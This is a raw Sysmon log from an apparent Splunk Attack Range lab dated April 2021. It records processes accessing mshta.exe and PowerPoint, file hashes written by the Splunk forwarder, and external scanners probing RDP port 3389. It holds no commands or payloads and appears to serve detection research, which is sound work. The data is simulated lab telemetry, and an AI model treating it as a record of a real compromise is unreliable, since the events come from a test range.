14:59:38.121{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.121{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.105{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC4F-607E-6A0F-00000000BB01}7016C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:37.996{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF6B5098093B8ADCD4FCA2C0D3CF4DC3,SHA256=702AC55D57312CCA1060949152B057E4C6D319ED306B006BB903743212170F1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050818Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:38.871{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640163FDFDE4519CA332CE4BC76852D4,SHA256=DB8454818CAE86DD55F7F8EBF1BB5BAF129F1988396FE6C2626FA214D200BEF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050817Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:36.541{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49154-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050816Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:36.429{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com65518-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050815Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:36.363{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62583-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000082092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:37.572{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30379-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:39.043{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E8C21D754721438C9596A2AB1006958,SHA256=65E9EEE218CAF2D230CB7652D7F918EBEB507728769BABE2A3D719A34044749A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050820Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:39.886{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E7D7E808CBFCA47CBBAD78F724F0E0D,SHA256=310623ABD1BAA47D9699F169FDB13D7F202C58FB67263C8A5C72251EB9D5E65E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050819Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:39.121{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E6C26A16806B429B80832EE6494C681,SHA256=06F703D780CFEEE433EEFF1AC52E4524756DEB7830A802877AD4CA4993C5A83A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:40.527{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000082096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:39.067{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-31738-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:38.517{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53606-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:40.262{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A37EC3DCA888A08E51A97E0F553CC8,SHA256=7A415EAD92513CDD7E9DA636B3579DD3008EE5229CC2A4F529E6A17DF2E3FA0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:40.074{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=586AFD2DF80E60492596DDF269B7EDD5,SHA256=84A2AA5225712E28139E98F7A995B5F3DE95385DC32D6BF04A621C8666949668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050823Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:40.886{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE665A3B1D38A9F695E86E15940F330,SHA256=50710455C706643A1CDC265A38E9A9310C2DD8C2B617AF34FE8568D11F594920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050822Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:40.652{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=853CDDF3E9D3B82903E9CE5EFDCA6983,SHA256=3CC51A8892C31609517CFE883277A8409B5BD1ADEBB6345C6C516B08AA1BFC5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050821Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:37.804{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52552-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000082104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:39.233{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57655-false10.0.1.12-8000- 23542300x800000000000000082103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.293{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C8784C4DFEA15203C3AC2A9BDE33EE08,SHA256=A58B908EF48228111231B3F394407AE7A9F56841309F3EF08D5878A0165A5ED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.199{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C8784C4DFEA15203C3AC2A9BDE33EE08,SHA256=A58B908EF48228111231B3F394407AE7A9F56841309F3EF08D5878A0165A5ED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.199{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=B9CFD3BFBDADF4B365A5525AA3B4E5FA,SHA256=BBE0E0ACF2B87B0B76277958FBF0E595CC23EABE66DCADB2AAC7697143A4A06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.090{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35D050E71AB92822649F8C975D5173A,SHA256=C969626FCC2E4F9E8794B949D11ED2E5BBF860AB07F6348E5E56FC9EDB24DEDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.043{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:41.043{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050824Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:41.887{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3F01E86B5AC91456817CE6C1D54182E,SHA256=6CE688088F62CFA0605116020A7FE61F94515EB9BD17D219CD1F4756007431F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.840{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-walMD5=2B43325E6D0902506352B2FC1EB63757,SHA256=EA288037AB672E246E18F2A29200FB84CCF813E52DD8E8B8BFC048353803A8EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.840{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-shmMD5=8A707F1CB9C4DF545909FBC8B126CD57,SHA256=603D5AF3460652AA9D5F15E1C300869958246559D3F9C16A615DCDE9F46ECDBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.590{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.CampaignStates.jsonMD5=80C6FAC07612D95C9B464D0FCFC81F84,SHA256=524087402D791F0BF5E23D453F71B66743417FCF6CA18FE5F5F0EE5AEA5CE6DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-C0A6-607E-8105-00000000BB01}8366048C:\Windows\Explorer.EXE{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:42.574{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC5E-607E-6D0F-00000000BB01}4520C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 